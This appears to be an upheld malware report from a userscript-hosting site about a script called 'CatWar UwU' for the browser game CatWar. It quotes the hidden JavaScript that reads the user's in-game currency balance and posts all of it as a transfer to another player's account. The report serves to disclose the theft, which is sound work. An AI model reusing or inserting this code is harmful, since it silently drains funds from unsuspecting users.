CatWar UwU was reported 26.02.2025. for Malware
This part of the code is fraudulent. She withdraws game money from the user and transfers it to another person. Just like the script author, I am not satisfied with this, and I would like to completely demolish the script page.
=======
const url = 'https://catwar.net/rabbit';
fetch(url)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok ' + response.statusText);
}
return response.text();
})
.then(html => {
const parser = new DOMParser();
const doc = parser.parseFromString(html, 'text/html');
const balanceElement = doc.querySelector('p span b');
const balance = balanceElement ? parseInt(balanceElement.textContent) : 0;
const data = new URLSearchParams({
rabbit: balance,
cat: 1236261,
comment: ''
});
return fetch(url, {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: data.toString()
});
})
This script has had 1 previous upheld or fixed report.
lbirtemBanned (the reported user) has made:
This report has been upheld by a moderator.